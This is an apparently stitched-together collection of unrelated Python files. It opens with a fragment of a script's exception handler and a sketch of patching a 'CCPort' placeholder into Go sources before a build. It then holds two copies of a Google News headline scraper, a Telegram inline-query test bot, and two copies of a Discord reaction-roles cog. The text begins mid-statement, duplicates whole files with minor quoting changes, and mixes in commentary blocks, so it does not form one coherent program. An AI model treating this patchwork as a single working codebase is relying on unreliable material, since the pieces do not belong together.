h_len, histfile) main(args.target) except (KeyboardInterrupt, EOFError, SystemExit): sys.exit(0) except BaseException: log_error(f"[!] Exception:\n{traceback.format_exc()}")
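# set_tags() and unset_tags() above implement a backup / patch / restore cycle around
# `go build`: the Go sources are copied aside, placeholders are rewritten in place with
# the sed() helper, and the pristine files are moved back afterwards. A compact sketch
# of that cycle; the file path and placeholder strings are illustrative.
import shutil

def sed(path, old, new):
    # same behaviour as the sed() helper above: read, replace every occurrence, write back
    with open(path) as f:
        text = f.read()
    with open(path, "w") as f:
        f.write(text.replace(old, new))

def patch_build_restore(source_file, replacements, build):
    backup = source_file + ".bak"
    shutil.copy(source_file, backup)           # backup the source file
    try:
        for old, new in replacements.items():  # inject build-time values
            sed(source_file, old, new)
        build()                                # e.g. run `go build` here
    finally:
        shutil.move(backup, source_file)       # always restore the original

# usage sketch:
# patch_build_restore("./lib/data/def.go",
#                     {'CCPort = "[cc_port]"': 'CCPort = "4433"'},
#                     lambda: None)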
import requests  # importing request library to make https request to google news
# importing beautiful soup to extract data from the website
from bs4 import BeautifulSoup
import csv

requirement = int(input(
    "Please Enter the number of articles that is required in the excel file.\n"))

stub = "https://www.news.google.com"
URL = "https://news.google.com/topics/CAAqKggKIiRDQkFTRlFvSUwyMHZNRFZxYUdjU0JXVnVMVWRDR2dKSlRpZ0FQAQ?hl=en-IN&gl=IN&ceid=IN%3Aen"

r = requests.get(URL)
soup = BeautifulSoup(r.text, 'html5lib')

extracted_items = []
for row in soup.findAll('a', attrs={'class': 'DY5T1d RZIKme'})[:requirement]:
    extracted_item = {}
    extracted_item['Headline'] = row.text
    extracted_item['Link of news article'] = rf"{stub + row["href"][1:]}"
    extracted_items.append(extracted_item)

filename = "news.csv"
with open(filename, 'w', newline="", encoding='utf8') as f:
    w = csv.DictWriter(f, ['Headline', 'Link of news article'])
    w.writeheader()
    for extracted_item in extracted_items:
        w.writerow(extracted_item)
import requests  # importing request library to make https request to google news
# importing beautiful soup to extract data from the website
from bs4 import BeautifulSoup
import csv

requirement = int(input(
    "Please Enter the number of articles that is required in the excel file.\n"))

stub = "https://www.news.google.com"
URL = "https://news.google.com/topics/CAAqKggKIiRDQkFTRlFvSUwyMHZNRFZxYUdjU0JXVnVMVWRDR2dKSlRpZ0FQAQ?hl=en-IN&gl=IN&ceid=IN%3Aen"

r = requests.get(URL)
soup = BeautifulSoup(r.text, 'html5lib')

extracted_items = []
for row in soup.findAll('a', attrs={'class': 'DY5T1d RZIKme'})[:requirement]:
    extracted_item = {}
    extracted_item['Headline'] = row.text
    extracted_item['Link of news article'] = rf"{stub + row['href'][1:]}"
    extracted_items.append(extracted_item)

filename = "news.csv"
with open(filename, 'w', newline="", encoding='utf8') as f:
    w = csv.DictWriter(f, ['Headline', 'Link of news article'])
    w.writeheader()
    for extracted_item in extracted_items:
        w.writerow(extracted_item)
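# The only difference between the two copies of the scraper above is the quoting inside
# the f-string expression: row["href"] inside a double-quoted f-string is valid only on
# Python 3.12+ (PEP 701), while row['href'] also works on earlier versions. A quick
# illustration of the version-portable form (the row dict here is a stand-in for the
# BeautifulSoup tag):
row = {"href": "./articles/example"}
stub = "https://www.news.google.com"
link = f"{stub + row['href'][1:]}"   # portable on any supported Python version
print(link)                          # https://www.news.google.com/articles/example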
# coding=utf8 import asyncio import time import threading import pprint import sys import traceback import random import amanobot import amanobot.aio from amanobot.namedtuple import ( InlineQuery, ChosenInlineResult, InputTextMessageContent, InlineQueryResultArticle, InlineQueryResultPhoto, InlineQueryResultGame) def equivalent(data, nt): if type(data) is dict: keys = list(data.keys()) # number of dictionary keys == number of non-None values in namedtuple? if len(keys) != len([f for f in nt._fields if getattr(nt, f) is not None]): return False # map `from` to `from_` fields = list([k+'_' if k in ['from'] else k for k in keys]) return all(map(equivalent, [data[k] for k in keys], [getattr(nt, f) for f in fields])) elif type(data) is list: return all(map(equivalent, data, nt)) else: return data==nt def examine(result, type): try: print('Examining %s ......' % type) nt = type(**result) assert equivalent(result, nt), 'Not equivalent:::::::::::::::\n%s\n::::::::::::::::\n%s' % (result, nt) pprint.pprint(result) pprint.pprint(nt) print() except AssertionError: traceback.print_exc() print('Do you want to continue? [y]', end=' ') answer = input() if answer != 'y': exit(1) def on_inline_query(msg): def compute(): articles = [InlineQueryResultArticle( id='abc', title='HK', input_message_content=InputTextMessageContent(message_text='Hong Kong'), url='https://www.google.com', hide_url=True), {'type': 'article', 'id': 'def', 'title': 'SZ', 'input_message_content': {'message_text': 'Shenzhen'}, 'url': 'https://www.yahoo.com'}] photos = [InlineQueryResultPhoto( id='123', photo_url='https://core.telegram.org/file/811140934/1/tbDSLHSaijc/fdcc7b6d5fb3354adf', thumb_url='https://core.telegram.org/file/811140934/1/tbDSLHSaijc/fdcc7b6d5fb3354adf'), {'type': 'photo', 'id': '345', 'photo_url': 'https://core.telegram.org/file/811140184/1/5YJxx-rostA/ad3f74094485fb97bd', 'thumb_url': 'https://core.telegram.org/file/811140184/1/5YJxx-rostA/ad3f74094485fb97bd', 'caption': 'Caption', 'title': 'Title', 'input_message_content': {'message_text': 'Shenzhen'}}] games = [InlineQueryResultGame( id='abc', game_short_name='sunchaser')] results = random.choice([articles, photos, games]) return results query_id, from_id, query = amanobot.glance(msg, flavor='inline_query') if from_id != USER_ID: print('Unauthorized user:', from_id) return examine(msg, InlineQuery) answerer.answer(msg, compute) def on_chosen_inline_result(msg): result_id, from_id, query = amanobot.glance(msg, flavor='chosen_inline_result') if from_id != USER_ID: print('Unauthorized user:', from_id) return examine(msg, ChosenInlineResult) print('Chosen inline query:') pprint.pprint(msg) TOKEN = sys.argv[1] USER_ID = int(sys.argv[2]) bot = amanobot.aio.Bot(TOKEN) answerer = amanobot.aio.helper.Answerer(bot) loop = asyncio.get_event_loop() print('Give me an inline query.') loop.create_task(bot.message_loop({'inline_query': on_inline_query, 'chosen_inline_result': on_chosen_inline_result})) loop.run_forever()
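# The equivalent() helper above checks that a raw Telegram dict and the namedtuple built
# from it carry the same information, renaming the reserved word `from` to `from_`. A
# self-contained sketch of that check; the User namedtuple is only an illustration.
from collections import namedtuple

User = namedtuple("User", ["id", "first_name", "from_"], defaults=(None, None, None))

def equivalent(data, nt):
    if isinstance(data, dict):
        keys = list(data.keys())
        # every dict key must correspond to a non-None namedtuple field, and vice versa
        if len(keys) != len([f for f in nt._fields if getattr(nt, f) is not None]):
            return False
        fields = [k + "_" if k == "from" else k for k in keys]
        return all(equivalent(data[k], getattr(nt, f)) for k, f in zip(keys, fields))
    if isinstance(data, list):
        return all(map(equivalent, data, nt))
    return data == nt

print(equivalent({"id": 1, "first_name": "A"}, User(id=1, first_name="A")))   # True
print(equivalent({"id": 1, "first_name": "B"}, User(id=1, first_name="A")))   # False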
import disnake from typing import Union from disnake.ext import commands import database as db import constants as var from functions import get_prefix from ext.permissions import has_command_permission class ReactionRoles(commands.Cog): def __init__(self, bot): self.bot = bot async def cog_check(self, ctx): """Simple check to see if this cog (plugin) is enabled.""" guild_doc = await db.PLUGINS.find_one({"_id": ctx.guild.id}) if guild_doc.get("ReactionRoles"): return True else: await ctx.send( embed=disnake.Embed( description=( f"{var.E_DISABLE} The Reaction Roles plugin" " is disabled in this server" ), color=var.C_ORANGE ) ) @commands.command() @has_command_permission() async def rr( self, ctx, channel: disnake.TextChannel = None, message_id: Union[int, None] = None, role: disnake.Role = None, emoji: Union[disnake.Emoji, str] = None ): if type(emoji) == str and emoji.startswith("<"): raise commands.EmojiNotFound(ctx) if {channel, message_id, role, emoji} == {None}: return await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the channel, message, " "role and emoji all three to add a reaction role," " make sure the IDs are numerical." ), color=var.C_RED ).add_field( name="Format", value=( f"`{await get_prefix(ctx)}rr" " <#channel> <messageid> <role> <emoji>`" ) ).set_footer( text=( "You can use either role ID or mention it (use ID if " "you don't want to disturb everyone having the role)" ) ) ) bot_member = ctx.guild.get_member(self.bot.user.id) try: bot_role = bot_member.roles[1] except IndexError: bot_role = bot_member.roles[0] try: msg = channel.get_partial_message(message_id) except Exception: raise commands.MessageNotFound(ctx) if bot_role.position >= role.position: guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is None: await db.REACTION_ROLES.insert_one( { "_id": ctx.guild.id, "reaction_roles": [{ "messageid": msg.id, "roleid": role.id, "emoji": str(emoji) }], "unique_messages": [] } ) await msg.add_reaction(emoji) await ctx.send( f"Reaction role for {role} using {emoji} setted up!" f" https://disnake.com/channels/{ctx.message.guild.id}" f"/{msg.channel.id}/{msg.id}" ) else: guildrr_list = guild_doc["reaction_roles"] def check(): for i in guildrr_list: if i.get("messageid") == msg.id and i.get( "emoji") == str(emoji): return True if check(): await ctx.send( "You have already setup this reaction role" f" using {emoji} on that message :D " "I can see it in the database!" ) else: new_list = guildrr_list.copy() new_list.append( { "messageid": msg.id, "roleid": role.id, "emoji": str(emoji) } ) new_data = { "$set": { "reaction_roles": new_list } } await db.REACTION_ROLES.update_one(guild_doc, new_data) await msg.add_reaction(emoji) await ctx.send( f"Reaction role for {role} using {emoji} setted up!" 
f" https://disnake.com/channels/{ctx.message.guild.id}" f"/{msg.channel.id}/{msg.id}" ) else: await ctx.send( embed=disnake.Embed( title="Role position error", description=( f"The role {role.mention} is above my role " f"({bot_role.mention}), in order for me to update any " f"role (reaction roles) my role needs to be above that " f"role, just move my role above your reaction role as " f"shown below\n\n **Server Settings > Roles > Click on" f" the {bot_role.mention} Role > Drag it above the " f"{role.mention} Role **(Shown as the Developer role in" f" the image below)" ), color=var.C_RED ).set_image( url=( "https://cdn.disnakeapp.com/attachments/" "843519647055609856/850711272726986802/unknown.png" ) ) ) @commands.command(name="removerr") @has_command_permission() async def remove_rr( self, ctx, message_id: Union[int, str] = None, emoji: Union[disnake.Emoji, str] = None ): if {message_id, emoji} == {None}: return await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the message " "and emoji both to remove a reaction role" ), color=var.C_RED ).add_field( name="Format", value=( f"`{await get_prefix(ctx)}removerr " f"<messageid> <emoji>`" ) ) ) if type(emoji) == str and emoji.startswith("<"): raise commands.EmojiNotFound(ctx) if type(message_id) == str: return await ctx.send( embed=disnake.Embed( description="Message ID needs to be numerical", color=var.C_ORANGE ) ) guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) def rr_exists(): for i in guild_doc["reaction_roles"]: if ( i.get("messageid") == message_id and i.get("emoji") == str(emoji) ): return True if rr_exists(): def get_pair(lst): for rr_pairs in lst: if ( message_id == rr_pairs.get("messageid") and str(emoji) == rr_pairs.get("emoji") ): return rr_pairs rr_list = guild_doc["reaction_roles"] new_list = rr_list.copy() pair = get_pair(new_list) new_list.remove(pair) new_data = { "$set": { "reaction_roles": new_list } } role = ctx.guild.get_role(pair["roleid"]) await db.REACTION_ROLES.update_one(guild_doc, new_data) await ctx.send( embed=disnake.Embed( title="Reaction role removed", description=( f"Reaction role for {role} using {emoji} " f"on message with ID {message_id} has been removed" ), color=var.C_GREEN ) ) else: await ctx.send("This reaction role does not exist") @commands.command(name="allrr", aliases=['rrall']) @has_command_permission() async def all_rr(self, ctx): guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is not None and guild_doc["reaction_roles"] != []: rr_amount = len(guild_doc.get("reaction_roles")) if rr_amount <= 10: exact_pages = 1 else: exact_pages = rr_amount / 10 all_pages = round(exact_pages) embed = disnake.Embed( title="All active reaction roles", color=var.C_MAIN ) rr_count = 0 for i in guild_doc["reaction_roles"]: rr_count += 1 message_id = i.get("messageid") role = ctx.guild.get_role(i.get("roleid")) emoji = i.get("emoji") embed.add_field( name="** **", value=( f"{emoji} for {role.mention if role else "deleted role"} " f"in message ID `{message_id}`" ), inline=False ) if rr_count == 10: break embed.set_footer(text=f"Page 1/{all_pages}") bot_msg = await ctx.send(embed=embed) await bot_msg.add_reaction("◀️") await bot_msg.add_reaction("⬅️") await bot_msg.add_reaction("➡️") await bot_msg.add_reaction("▶️") async def reaction_roles_pagination(current_page, embed): page_rn = current_page + 1 embed.set_footer(text=f"Page {page_rn}/{all_pages}") embed.clear_fields() rr_count = current_page * 10 rr_amount = current_page * 10 for i in 
guild_doc["reaction_roles"][rr_amount:]: rr_count += 1 message_id = i.get("messageid") role = ctx.guild.get_role(i.get("roleid")) emoji = i.get("emoji") embed.add_field( name=f"** **", value=( f"{emoji} for {role.mention if role else "deleted role"}\n" f"MessageID: `{message_id}`" ), inline=False ) if rr_count == (current_page) * 10 + 10: break def reaction_check(r, u): if ( str(r.emoji) == "◀️" or str(r.emoji) == "⬅️" or str(r.emoji) == "➡️" or str(r.emoji) == "▶️" ): return u == ctx.author and r.message == bot_msg current_page = 0 while True: reaction, user = await self.bot.wait_for("reaction_add", check=reaction_check) if str(reaction.emoji) == "◀️": try: await bot_msg.remove_reaction("◀️", ctx.author) except disnake.Forbidden: pass current_page = 0 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) if str(reaction.emoji) == "➡️": try: await bot_msg.remove_reaction("➡️", ctx.author) except disnake.Forbidden: pass current_page += 1 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) if str(reaction.emoji) == "⬅️": try: await bot_msg.remove_reaction("⬅️", ctx.author) except disnake.Forbidden: pass current_page -= 1 if current_page < 0: current_page += 1 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) if str(reaction.emoji) == "▶️": try: await bot_msg.remove_reaction("▶️", ctx.author) except disnake.Forbidden: pass current_page = all_pages - 1 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) else: await ctx.send( "This server does not have any active reaction roles right now" ) @commands.command(name="uniquerr") @has_command_permission() async def unique_rr(self, ctx, msg: disnake.Message = None): if msg is not None: guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is not None: unique_list = guild_doc["unique_messages"] all_msg_ids = [i.get("messageid") for i in guild_doc["reaction_roles"]] if msg.id in all_msg_ids: new_list = unique_list.copy() new_list.append(msg.id) new_data = { "$set": { "unique_messages": new_list } } await db.REACTION_ROLES.update_one(guild_doc, new_data) await ctx.send( embed=disnake.Embed( title=( "Successfully marked the message " "with unique reactions" ), description=( "Now users can only react to one emoji and " "take one role in [this message]" f"(https://disnake.com/channels/{ctx.guild.id}" f"/{msg.channel.id}/{msg.id})" ), color=var.C_GREEN ) ) else: await ctx.send( "Hmm it looks like that the message id " "you entered does not have any reaction role." 
) else: await ctx.send( "Cannot mark that message with unique reactions " "since this server does not have any reaction roles yet :(" ) else: await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the message " "in order to mark it with unique reactions" ), color=var.C_RED ).add_field( name="Format", value=f"`{await get_prefix(ctx)}uniquerr <messageid>`" ) ) @commands.command(name="removeunique") @has_command_permission() async def remove_unique(self, ctx, msg: disnake.Message = None): if msg is not None: guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is not None: unique_list = guild_doc["unique_messages"] all_msg_ids = [i.get("messageid") for i in guild_doc["reaction_roles"]] if msg.id in all_msg_ids and msg.id in unique_list: new_list = unique_list.copy() new_list.remove(msg.id) new_data = { "$set": { "unique_messages": new_list } } await db.REACTION_ROLES.update_one(guild_doc, new_data) await ctx.send( embed=disnake.Embed( title=( "Successfully unmarked the " "message with unique reactions" ), description=( "Now users can react and take multiple roles " "in [this message](https://disnake.com/channels" f"/{ctx.guild.id}/{msg.channel.id}/{msg.id})" ), color=var.C_GREEN ) ) else: await ctx.send( "Hmm it looks like that the message id you entered does" " not have any reaction role so can't remove the unique" " mark either." ) else: await ctx.send( "Cannot remove the unique mark from that message since you" " don't have any reaction roles yet :(" ) else: await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the message in order " "to unmark it with unique reactions" ), color=var.C_RED ).add_field( name="Format", value=f"`{await get_prefix(ctx)}uniquerr <messageid>`" ) ) @commands.Cog.listener() async def on_raw_reaction_add(self, payload): # Listeners don't care about cog checks so need to add a check manually guild_doc = await db.REACTION_ROLES.find_one({"_id": payload.guild_id}) if guild_doc is not None and guild_doc["reaction_roles"] is not None: for i in guild_doc["reaction_roles"]: if ( payload.message_id == i.get("messageid") and str(payload.emoji) == i.get("emoji") ): role_id = i.get("roleid") guild = self.bot.get_guild(payload.guild_id) assign_role = guild.get_role(role_id) if not payload.member.bot: await payload.member.add_roles(assign_role) if ( guild_doc is not None and payload.message_id in guild_doc["unique_messages"] ): channel = self.bot.get_channel(payload.channel_id) message = await channel.fetch_message(payload.message_id) for r in message.reactions: if ( payload.member in await r.users().flatten() and not payload.member.bot and str(r) != str(payload.emoji) ): await message.remove_reaction(r.emoji, payload.member) @commands.Cog.listener() # Listeners don't care about cog checks so need to add a check manually async def on_raw_reaction_remove(self, payload): guild_doc = await db.REACTION_ROLES.find_one({"_id": payload.guild_id}) if guild_doc is not None and guild_doc["reaction_roles"] is not None: for i in guild_doc["reaction_roles"]: if ( payload.message_id == i.get("messageid") and str(payload.emoji) == i.get("emoji") ): role_id = i.get("roleid") member = ( self.bot.get_guild(payload.guild_id) .get_member(payload.user_id) ) if member is not None: guild = self.bot.get_guild(payload.guild_id) remove_role = guild.get_role(role_id) await member.remove_roles(remove_role) def setup(bot): bot.add_cog(ReactionRoles(bot))
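# Every write in the cog above follows the same round trip: fetch the guild document,
# copy the reaction_roles array, mutate the copy, and push it back with a $set update.
# A standalone sketch of that pattern with motor (the async MongoDB driver); the
# connection string and database/collection names are placeholders, not the bot's own.
from motor.motor_asyncio import AsyncIOMotorClient

async def add_reaction_role(collection, guild_id, message_id, role_id, emoji):
    doc = await collection.find_one({"_id": guild_id})
    entry = {"messageid": message_id, "roleid": role_id, "emoji": emoji}
    if doc is None:
        # first reaction role for this guild: create the document
        await collection.insert_one(
            {"_id": guild_id, "reaction_roles": [entry], "unique_messages": []}
        )
        return
    new_list = doc["reaction_roles"].copy()
    new_list.append(entry)
    await collection.update_one({"_id": guild_id}, {"$set": {"reaction_roles": new_list}})

async def demo():
    client = AsyncIOMotorClient("mongodb://localhost:27017")   # placeholder URI
    coll = client["botdb"]["reaction_roles"]                   # placeholder names
    await add_reaction_role(coll, 1234, 5678, 9012, "👍")

# import asyncio; asyncio.run(demo())  # requires a reachable MongoDB instance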
import disnake from typing import Union from disnake.ext import commands import database as db import constants as var from functions import get_prefix from ext.permissions import has_command_permission class ReactionRoles(commands.Cog): def __init__(self, bot): self.bot = bot async def cog_check(self, ctx): """Simple check to see if this cog (plugin) is enabled.""" guild_doc = await db.PLUGINS.find_one({"_id": ctx.guild.id}) if guild_doc.get("ReactionRoles"): return True else: await ctx.send( embed=disnake.Embed( description=( f"{var.E_DISABLE} The Reaction Roles plugin" " is disabled in this server" ), color=var.C_ORANGE ) ) @commands.command() @has_command_permission() async def rr( self, ctx, channel: disnake.TextChannel = None, message_id: Union[int, None] = None, role: disnake.Role = None, emoji: Union[disnake.Emoji, str] = None ): if type(emoji) == str and emoji.startswith("<"): raise commands.EmojiNotFound(ctx) if {channel, message_id, role, emoji} == {None}: return await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the channel, message, " "role and emoji all three to add a reaction role," " make sure the IDs are numerical." ), color=var.C_RED ).add_field( name="Format", value=( f"`{await get_prefix(ctx)}rr" " <#channel> <messageid> <role> <emoji>`" ) ).set_footer( text=( "You can use either role ID or mention it (use ID if " "you don't want to disturb everyone having the role)" ) ) ) bot_member = ctx.guild.get_member(self.bot.user.id) try: bot_role = bot_member.roles[1] except IndexError: bot_role = bot_member.roles[0] try: msg = channel.get_partial_message(message_id) except Exception: raise commands.MessageNotFound(ctx) if bot_role.position >= role.position: guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is None: await db.REACTION_ROLES.insert_one( { "_id": ctx.guild.id, "reaction_roles": [{ "messageid": msg.id, "roleid": role.id, "emoji": str(emoji) }], "unique_messages": [] } ) await msg.add_reaction(emoji) await ctx.send( f"Reaction role for {role} using {emoji} setted up!" f" https://disnake.com/channels/{ctx.message.guild.id}" f"/{msg.channel.id}/{msg.id}" ) else: guildrr_list = guild_doc["reaction_roles"] def check(): for i in guildrr_list: if i.get("messageid") == msg.id and i.get( "emoji") == str(emoji): return True if check(): await ctx.send( "You have already setup this reaction role" f" using {emoji} on that message :D " "I can see it in the database!" ) else: new_list = guildrr_list.copy() new_list.append( { "messageid": msg.id, "roleid": role.id, "emoji": str(emoji) } ) new_data = { "$set": { "reaction_roles": new_list } } await db.REACTION_ROLES.update_one(guild_doc, new_data) await msg.add_reaction(emoji) await ctx.send( f"Reaction role for {role} using {emoji} setted up!" 
f" https://disnake.com/channels/{ctx.message.guild.id}" f"/{msg.channel.id}/{msg.id}" ) else: await ctx.send( embed=disnake.Embed( title="Role position error", description=( f"The role {role.mention} is above my role " f"({bot_role.mention}), in order for me to update any " f"role (reaction roles) my role needs to be above that " f"role, just move my role above your reaction role as " f"shown below\n\n **Server Settings > Roles > Click on" f" the {bot_role.mention} Role > Drag it above the " f"{role.mention} Role **(Shown as the Developer role in" f" the image below)" ), color=var.C_RED ).set_image( url=( "https://cdn.disnakeapp.com/attachments/" "843519647055609856/850711272726986802/unknown.png" ) ) ) @commands.command(name="removerr") @has_command_permission() async def remove_rr( self, ctx, message_id: Union[int, str] = None, emoji: Union[disnake.Emoji, str] = None ): if {message_id, emoji} == {None}: return await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the message " "and emoji both to remove a reaction role" ), color=var.C_RED ).add_field( name="Format", value=( f"`{await get_prefix(ctx)}removerr " f"<messageid> <emoji>`" ) ) ) if type(emoji) == str and emoji.startswith("<"): raise commands.EmojiNotFound(ctx) if type(message_id) == str: return await ctx.send( embed=disnake.Embed( description="Message ID needs to be numerical", color=var.C_ORANGE ) ) guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) def rr_exists(): for i in guild_doc["reaction_roles"]: if ( i.get("messageid") == message_id and i.get("emoji") == str(emoji) ): return True if rr_exists(): def get_pair(lst): for rr_pairs in lst: if ( message_id == rr_pairs.get("messageid") and str(emoji) == rr_pairs.get("emoji") ): return rr_pairs rr_list = guild_doc["reaction_roles"] new_list = rr_list.copy() pair = get_pair(new_list) new_list.remove(pair) new_data = { "$set": { "reaction_roles": new_list } } role = ctx.guild.get_role(pair["roleid"]) await db.REACTION_ROLES.update_one(guild_doc, new_data) await ctx.send( embed=disnake.Embed( title="Reaction role removed", description=( f"Reaction role for {role} using {emoji} " f"on message with ID {message_id} has been removed" ), color=var.C_GREEN ) ) else: await ctx.send("This reaction role does not exist") @commands.command(name="allrr", aliases=['rrall']) @has_command_permission() async def all_rr(self, ctx): guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is not None and guild_doc["reaction_roles"] != []: rr_amount = len(guild_doc.get("reaction_roles")) if rr_amount <= 10: exact_pages = 1 else: exact_pages = rr_amount / 10 all_pages = round(exact_pages) embed = disnake.Embed( title="All active reaction roles", color=var.C_MAIN ) rr_count = 0 for i in guild_doc["reaction_roles"]: rr_count += 1 message_id = i.get("messageid") role = ctx.guild.get_role(i.get("roleid")) emoji = i.get("emoji") embed.add_field( name="** **", value=( f"{emoji} for {role.mention if role else 'deleted role'} " f"in message ID `{message_id}`" ), inline=False ) if rr_count == 10: break embed.set_footer(text=f"Page 1/{all_pages}") bot_msg = await ctx.send(embed=embed) await bot_msg.add_reaction("◀️") await bot_msg.add_reaction("⬅️") await bot_msg.add_reaction("➡️") await bot_msg.add_reaction("▶️") async def reaction_roles_pagination(current_page, embed): page_rn = current_page + 1 embed.set_footer(text=f"Page {page_rn}/{all_pages}") embed.clear_fields() rr_count = current_page * 10 rr_amount = current_page * 10 for i in 
guild_doc["reaction_roles"][rr_amount:]: rr_count += 1 message_id = i.get("messageid") role = ctx.guild.get_role(i.get("roleid")) emoji = i.get("emoji") embed.add_field( name=f"** **", value=( f"{emoji} for {role.mention if role else 'deleted role'}\n" f"MessageID: `{message_id}`" ), inline=False ) if rr_count == (current_page) * 10 + 10: break def reaction_check(r, u): if ( str(r.emoji) == "◀️" or str(r.emoji) == "⬅️" or str(r.emoji) == "➡️" or str(r.emoji) == "▶️" ): return u == ctx.author and r.message == bot_msg current_page = 0 while True: reaction, user = await self.bot.wait_for("reaction_add", check=reaction_check) if str(reaction.emoji) == "◀️": try: await bot_msg.remove_reaction("◀️", ctx.author) except disnake.Forbidden: pass current_page = 0 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) if str(reaction.emoji) == "➡️": try: await bot_msg.remove_reaction("➡️", ctx.author) except disnake.Forbidden: pass current_page += 1 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) if str(reaction.emoji) == "⬅️": try: await bot_msg.remove_reaction("⬅️", ctx.author) except disnake.Forbidden: pass current_page -= 1 if current_page < 0: current_page += 1 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) if str(reaction.emoji) == "▶️": try: await bot_msg.remove_reaction("▶️", ctx.author) except disnake.Forbidden: pass current_page = all_pages - 1 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) else: await ctx.send( "This server does not have any active reaction roles right now" ) @commands.command(name="uniquerr") @has_command_permission() async def unique_rr(self, ctx, msg: disnake.Message = None): if msg is not None: guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is not None: unique_list = guild_doc["unique_messages"] all_msg_ids = [i.get("messageid") for i in guild_doc["reaction_roles"]] if msg.id in all_msg_ids: new_list = unique_list.copy() new_list.append(msg.id) new_data = { "$set": { "unique_messages": new_list } } await db.REACTION_ROLES.update_one(guild_doc, new_data) await ctx.send( embed=disnake.Embed( title=( "Successfully marked the message " "with unique reactions" ), description=( "Now users can only react to one emoji and " "take one role in [this message]" f"(https://disnake.com/channels/{ctx.guild.id}" f"/{msg.channel.id}/{msg.id})" ), color=var.C_GREEN ) ) else: await ctx.send( "Hmm it looks like that the message id " "you entered does not have any reaction role." 
) else: await ctx.send( "Cannot mark that message with unique reactions " "since this server does not have any reaction roles yet :(" ) else: await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the message " "in order to mark it with unique reactions" ), color=var.C_RED ).add_field( name="Format", value=f"`{await get_prefix(ctx)}uniquerr <messageid>`" ) ) @commands.command(name="removeunique") @has_command_permission() async def remove_unique(self, ctx, msg: disnake.Message = None): if msg is not None: guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is not None: unique_list = guild_doc["unique_messages"] all_msg_ids = [i.get("messageid") for i in guild_doc["reaction_roles"]] if msg.id in all_msg_ids and msg.id in unique_list: new_list = unique_list.copy() new_list.remove(msg.id) new_data = { "$set": { "unique_messages": new_list } } await db.REACTION_ROLES.update_one(guild_doc, new_data) await ctx.send( embed=disnake.Embed( title=( "Successfully unmarked the " "message with unique reactions" ), description=( "Now users can react and take multiple roles " "in [this message](https://disnake.com/channels" f"/{ctx.guild.id}/{msg.channel.id}/{msg.id})" ), color=var.C_GREEN ) ) else: await ctx.send( "Hmm it looks like that the message id you entered does" " not have any reaction role so can't remove the unique" " mark either." ) else: await ctx.send( "Cannot remove the unique mark from that message since you" " don't have any reaction roles yet :(" ) else: await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the message in order " "to unmark it with unique reactions" ), color=var.C_RED ).add_field( name="Format", value=f"`{await get_prefix(ctx)}uniquerr <messageid>`" ) ) @commands.Cog.listener() async def on_raw_reaction_add(self, payload): # Listeners don't care about cog checks so need to add a check manually guild_doc = await db.REACTION_ROLES.find_one({"_id": payload.guild_id}) if guild_doc is not None and guild_doc["reaction_roles"] is not None: for i in guild_doc["reaction_roles"]: if ( payload.message_id == i.get("messageid") and str(payload.emoji) == i.get("emoji") ): role_id = i.get("roleid") guild = self.bot.get_guild(payload.guild_id) assign_role = guild.get_role(role_id) if not payload.member.bot: await payload.member.add_roles(assign_role) if ( guild_doc is not None and payload.message_id in guild_doc["unique_messages"] ): channel = self.bot.get_channel(payload.channel_id) message = await channel.fetch_message(payload.message_id) for r in message.reactions: if ( payload.member in await r.users().flatten() and not payload.member.bot and str(r) != str(payload.emoji) ): await message.remove_reaction(r.emoji, payload.member) @commands.Cog.listener() # Listeners don't care about cog checks so need to add a check manually async def on_raw_reaction_remove(self, payload): guild_doc = await db.REACTION_ROLES.find_one({"_id": payload.guild_id}) if guild_doc is not None and guild_doc["reaction_roles"] is not None: for i in guild_doc["reaction_roles"]: if ( payload.message_id == i.get("messageid") and str(payload.emoji) == i.get("emoji") ): role_id = i.get("roleid") member = ( self.bot.get_guild(payload.guild_id) .get_member(payload.user_id) ) if member is not None: guild = self.bot.get_guild(payload.guild_id) remove_role = guild.get_role(role_id) await member.remove_roles(remove_role) def setup(bot): bot.add_cog(ReactionRoles(bot))
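# all_rr() above derives the page total with round(rr_amount / 10), which can
# under-count: 14 reaction roles give round(1.4) == 1, so the footer reports one page
# and the ▶️ "jump to last page" button lands on page 0 even though a second page of
# entries exists. Ceiling division avoids that; this is a standalone sketch, not the
# cog's own code.
import math

def page_count(total_items, per_page=10):
    return max(1, math.ceil(total_items / per_page))

def page_slice(items, page, per_page=10):
    start = page * per_page
    return items[start:start + per_page]

roles = list(range(14))            # pretend the guild has 14 reaction roles
print(page_count(len(roles)))      # 2
print(page_slice(roles, 1))        # [10, 11, 12, 13]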
